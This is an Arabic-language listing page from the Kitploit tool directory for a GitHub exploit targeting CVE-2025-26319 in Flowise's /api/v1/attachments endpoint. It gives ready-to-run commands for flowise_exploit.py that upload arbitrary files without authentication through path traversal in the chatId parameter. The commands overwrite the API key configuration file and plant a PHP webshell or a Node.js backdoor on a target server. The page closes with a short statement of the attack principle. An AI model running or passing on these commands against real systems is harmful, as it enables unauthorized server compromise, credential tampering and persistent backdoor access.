Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-26319 — استغلال لـ CVE-2025-26319 يستهدف نقطة نهاية /api/v1/attachments الخاصة بـ Flowise، مما يمكن من رفع ملف اعتباطي غير مصادق عليه وإنشاء webshell عبر path traversal. | Kitploit
أدوات/GitHubGitHub/redpack-kr/cve-2025-26319
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubredpack-kr/cve-2025-26319

CVE-2025-26319

استغلال لـ CVE-2025-26319 يستهدف نقطة نهاية /api/v1/attachments الخاصة بـ Flowise، مما يمكن من رفع ملف اعتباطي غير مصادق عليه وإنشاء webshell عبر path traversal.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-26319

  1. رفع الملفات الأساسي python flowise_exploit.py -u http://target:3000 -f local_file.txt -d /path/on/server/file.txt
  2. رفع ملف التكوين

تعديل تكوين مفتاح API

python flowise_exploit.py -u http://target:3000 -f new_api.json -d /root/.flowise/api.json 3. إنشاء ورفع Webshell تلقائيًا

رفع PHP Webshell

python flowise_exploit.py -u http://target:3000 --generate-webshell php --webshell-path /var/www/html/shell.php

رفع باب خلفي Node.js

python flowise_exploit.py -u http://target:3000 --generate-webshell nodejs --webshell-path /tmp/backdoor.js

مبدأ الهجوم استغلال مسار /api/v1/attachments الموجود في القائمة البيضاء، لا يتطلب التحقق من الهوية من خلال التلاعب بمعامل chatId لتنفيذ اجتياز المسار (../../../) رفع أي ملف إلى أي موقع في نظام ملفات الخادم

تنزيل الأداة